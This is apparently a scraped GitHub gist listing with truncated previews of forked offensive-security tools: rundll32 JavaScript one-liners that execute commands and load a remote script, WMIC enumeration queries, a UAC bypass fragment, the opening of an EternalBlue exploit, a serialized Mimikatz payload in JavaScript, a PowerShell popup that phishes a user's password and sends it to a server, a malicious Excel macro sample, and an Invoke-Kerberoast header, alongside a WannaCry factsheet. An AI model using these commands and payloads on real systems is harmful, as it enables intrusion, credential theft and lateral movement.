$ curl -s -H "X-Something: yeah" localhost:8000 > /dev/null
$ python serv.py
ERROR:root:User-Agent: curl/7.37.1
Host: localhost:8000
Accept: */*
X-Something: yeah
0x4243
0x4243
/ exec_via_rundll32
Created
June 24, 2017 13:51
— forked from Ridter/exec_via_rundll32
rundll32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") |
0x4243
/ wmic_cmds.txt
Created
June 24, 2017 13:50
— forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
0x4243
/ gist:f97d929e4b1b51fb9d352396582c115a
Created
May 28, 2017 19:35
— forked from hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86
CIA Stinger UAC bypass (likely)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
0x4243
/ cli.md
Created
May 17, 2017 21:28
— forked from phrawzty/2serv.py
simple http server to dump request headers
0x4243
/ eternalblue_exploit.py
Created
May 15, 2017 15:01
— forked from worawit/eternalblue7_exploit.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
0x4243
/ Wannacrypt0r-FACTSHEET.md
Created
May 13, 2017 14:20
— forked from rain-1/Wannacrypt0r-FACTSHEET.md
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comis up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.
SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
0x4243
/ katz.js
Created
April 29, 2017 16:45
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
| 0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
0x4243
/ powershellpopup.ps1
Created
January 20, 2017 20:17
— forked from mubix/powershellpopup.ps1
Powershell Popups, proxy aware and auth aware
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName); | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; | |
| $wc = new-object net.webclient; | |
| $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; | |
| $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; | |
| $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); | |
| $result = $wc.downloadstring('https://172.16.102.163'); |
0x4243
/ gist:a81861766f9ddc415aa9f6036457b756
Created
November 9, 2016 22:00
— forked from anonymous/gist:d0da355e5c21a122866808d37234cd5d
PowerShell malware [posted by @JohnLaTwC]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
| //posted by @JohnLaTwC | |
| // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
| ----------------------------------------------- macro ---------------------------------- | |
| Private Sub Workbook_Open() | |
| Call doom_Init | |
| Call doom_ShowHideSheets | |
| End Sub |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Invoke-Kerberoast.ps1 | |
| Author: Will Schroeder (@harmj0y), @machosec | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
| Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |